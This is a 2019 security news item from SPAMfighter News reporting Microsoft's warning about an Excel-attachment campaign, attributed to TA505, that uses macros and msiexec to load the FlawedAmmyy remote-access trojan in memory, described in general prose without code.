Explore the latest news and trends  

Sign up for our weekly security newsletter


Be the first to receive important updates on security





Send

Windows PCs targeted with new malware spread through .xls attachment

 

Microsoft Office applications are forever a favorite area of attack by cyber-criminals seeking to compromise Windows PCs. Once again this is occurring as fresh malware is being spread through an excel attachment within electronic mails inside macro. A form of action or some actions packed together, a macro can be run any number of times desired.

 

Evidently according to a warning by Microsoft, end-users require being vigilant of one fresh malware attack pretending to be certain Excel attachment aiming to infect Windows computers. The software giant's team of security experts asserts that there is one complex bundle of infections inside the Excel attachment which helps download the infamous RAT named FlawedAmmyy as well as run it straight away inside memory. The process consumes macro functions for showering assault on Windows computers. Proofpoint states the malevolent attack comes from TA505 name of a group, while FlawedAmmyy has acquired notoriety ever since it targeted companies within the retail and finance sectors. www.zdnet.com posted this, June 24, 2019.

 

Microsoft warns people receiving an e-mail having Excel attachment to avoid opening it.

 

For, if opened, the spread sheet even without any user interaction executes one macro function which executes an executable file named msiexec.exe that then pulls down one MSI archive. This last cluster of files has an executable that's digitally signed which's extracted and executed before it decrypts as well as executes another .exe file inside memory.

 

Executing inside memory aids malicious software bypass detection from AV programs which scrutinizes files that are solely on disk.

 

One particular file such as wsus.exe is subsequently pulled down and decrypted. It appears as the authorized WSUS (Windows Service Update Service) of Microsoft which's shown as digitally signed dated 19th June after which it decrypts the malicious software inside RAM, thereby planting FlawedAmmyy. www.timesnownews.com posted this, June 26, 2019.

 

And since the attachment in the attack contains Korean-language characters, it seems the targets are Korean-speaking people operating Windows computers.

 

However, Microsoft states the Threat Protection of the company safeguards consumers against the attack. Already Microsoft is battling the particular Windows malware while advising end-users that they mustn't enable macros.

 

» SPAMfighter News - 7/1/2019

3 simple steps to update drivers on your Windows PCSlow PC? Optimize your Slow PC with SLOW-PCfighter!Email Cluttered with Spam? Free Spam Filter!

Dear Reader

We are happy to see you are reading our IT Security News.

We do believe, that the foundation for a good work environment starts with fast, secure and high performing computers. If you agree, then you should take a look at our Business Solutions to Spam Filter & Antivirus for even the latest version of Exchange Servers - your colleagues will appreciate it!

Go back to previous page
Next